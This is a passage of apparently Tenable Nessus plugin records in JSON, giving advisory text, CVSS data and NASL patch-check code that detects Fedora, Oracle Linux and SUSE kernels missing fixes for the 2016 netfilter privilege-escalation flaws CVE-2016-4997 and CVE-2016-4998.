(isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-1583\", \"CVE-2016-4470\", \"CVE-2016-4997\", \"CVE-2016-4998\", \"CVE-2016-5728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2016-1c409313f4\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"kernel-4.6.3-300.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:51:02", "description": "Description of changes:\n\nkernel-uek\n[4.1.12-61.1.10.el7uek]\n- netfilter: x_tables: make sure e->next_offset covers remaining blob \nsize (Florian Westphal) [Orabug: 24682076] {CVE-2016-4997} {CVE-2016-4998}\n- netfilter: x_tables: validate e->target_offset early (Florian \nWestphal) [Orabug: 24682076] {CVE-2016-4997} {CVE-2016-4998}\n\n[4.1.12-61.1.9.el7uek]\n- xen-blkback: don't get ref for each queue (Bob Liu) [Orabug: \n24616917] - NVMe: Fix obtaining command result (Keith Busch) [Orabug: \n24655742]\n\n[4.1.12-61.1.8.el7uek]\n- Revert 'ixgbe: make a workaround to tx hang issue under dom' (Brian \nMaly) [Orabug: 24618738]\n\n[4.1.12-61.1.7.el7uek]\n- x86/xen: Add x86_platform.is_untracked_pat_range quirk to ignore ISA \nregions. (Konrad Rzeszutek Wilk) [Orabug: 24566046]", "edition": 27, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-23T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2016-3619)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4997", "CVE-2016-4998"], "modified": "2016-09-23T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-61.1.10.el6uek", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-61.1.10.el7uek", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2016-3619.NASL", "href": "https://www.tenable.com/plugins/nessus/93678", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2016-3619.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93678);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-4997\", \"CVE-2016-4998\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2016-3619)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\nkernel-uek\n[4.1.12-61.1.10.el7uek]\n- netfilter: x_tables: make sure e->next_offset covers remaining blob \nsize (Florian Westphal) [Orabug: 24682076] {CVE-2016-4997} {CVE-2016-4998}\n- netfilter: x_tables: validate e->target_offset early (Florian \nWestphal) [Orabug: 24682076] {CVE-2016-4997} {CVE-2016-4998}\n\n[4.1.12-61.1.9.el7uek]\n- xen-blkback: don't get ref for each queue (Bob Liu) [Orabug: \n24616917] - NVMe: Fix obtaining command result (Keith Busch) [Orabug: \n24655742]\n\n[4.1.12-61.1.8.el7uek]\n- Revert 'ixgbe: make a workaround to tx hang issue under dom' (Brian \nMaly) [Orabug: 24618738]\n\n[4.1.12-61.1.7.el7uek]\n- x86/xen: Add x86_platform.is_untracked_pat_range quirk to ignore ISA \nregions. (Konrad Rzeszutek Wilk) [Orabug: 24566046]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-September/006353.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-September/006354.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel 4.6.3 Netfilter Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-61.1.10.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-61.1.10.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-4997\", \"CVE-2016-4998\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2016-3619\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"4.1\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-4.1.12-61.1.10.el6uek-0.5.3-2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-61.1.10.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-61.1.10.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-61.1.10.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-61.1.10.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-61.1.10.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-61.1.10.el6uek\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"dtrace-modules-4.1.12-61.1.10.el7uek-0.5.3-2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-61.1.10.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-61.1.10.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-61.1.10.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-61.1.10.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-61.1.10.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-61.1.10.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:24:17", "description": "The SUSE Linux Enterprise 12 GA kernel was updated to receive one\ncritical security fix.\n\nSecurity issue fixed :\n\n - CVE-2016-4997: A buffer overflow in 32bit\n compat_setsockopt iptables handling could lead to a\n local privilege escalation. (bsc#986362)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 29, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-08-29T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:1710-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4997", "CVE-2016-4998"], "modified": "2016-08-29T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debugsource", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-devel"], "id": "SUSE_SU-2016-1710-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93172", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:1710-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93172);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-4997\", \"CVE-2016-4998\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:1710-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 GA kernel was updated to receive one\ncritical security fix.\n\nSecurity issue fixed :\n\n - CVE-2016-4997: A buffer overflow in 32bit\n compat_setsockopt iptables handling could lead to a\n local privilege escalation. (bsc#986362)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=986362\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4998/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161710-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ec7ab8a7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12 :\n\nzypper in -t patch SUSE-SLE-WE-12-2016-1013=1\n\nSUSE Linux Enterprise Software Development Kit 12 :\n\nzypper in -t patch SUSE-SLE-SDK-12-2016-1013=1\n\nSUSE Linux Enterprise Server 12 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-2016-1013=1\n\nSUSE Linux Enterprise Module for Public Cloud 12 :\n\nzypper in -t patch SUSE-SLE-Module-Public-Cloud-12-2016-1013=1\n\nSUSE Linux Enterprise Live Patching 12 :\n\nzypper in -t patch SUSE-SLE-Live-Patching-12-2016-1013=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2016-1013=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel 4.6.3 Netfilter Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"s390x\", reference:\"kernel-default-man-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-base-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-base-debuginfo-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-debuginfo-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-debugsource-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-devel-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-syms-3.12.60-52.54.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-devel-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-extra-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-syms-3.12.60-52.54.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.60-52.54.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:24:17", "description": "The SUSE Linux Enterprise 12 kernel was updated to receive critical\nsecurity and bugfixes.\n\nSecurity issue fixed :\n\n - CVE-2016-4997: A buffer overflow in 32bit\n compat_setsockopt iptables handling could lead to a\n local privilege escalation. (bsc#986362)\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 30, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-08-29T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:1709-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4997", "CVE-2016-4998"], "modified": "2016-08-29T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debugsource", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-devel"], "id": "SUSE_SU-2016-1709-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93171", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:1709-1.\n# The text itself is copyright (C) 